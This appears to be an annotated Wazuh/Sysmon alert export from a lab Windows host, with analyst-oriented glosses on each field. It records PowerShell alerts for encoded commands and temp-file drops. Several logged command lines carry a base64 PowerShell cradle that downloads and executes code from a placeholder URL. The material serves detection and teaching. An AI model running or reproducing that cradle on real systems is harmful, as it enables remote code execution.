data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpyc2gxe.upa.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:06.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 102 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534411.1993365 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:08.9554346Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285771 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:07.867
ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00}
ProcessId: 16560
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00}
ParentProcessId: 16460
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:07.867 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc7-680a-c40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16560 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16460 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 106 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534411.2001436 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:09.1484914Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285772 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:09.120
ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00}
ProcessId: 16560
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1
CreationUtcTime: 2025-04-24 22:40:09.120
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:09.120 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc7-680a-c40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16560 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:09.120 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 103 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534413.2004205 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:11.7337351Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285800 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:10.418
ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00}
ProcessId: 16772
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00}
ParentProcessId: 16560
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:10.418 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdca-680a-c70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16560 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 107 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534414.2012276 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:11.9674782Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285801 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:11.949
ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00}
ProcessId: 16772
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2glcj434.zx1.ps1
CreationUtcTime: 2025-04-24 22:40:11.949
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:11.949 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdca-680a-c70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2glcj434.zx1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:11.949 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 108 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534417.2015045 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:15.1527371Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285824 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:15.104
ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00}
ProcessId: 16908
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_apqxmac4.3kk.ps1
CreationUtcTime: 2025-04-24 22:40:15.104
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:15.104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdcd-680a-c90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
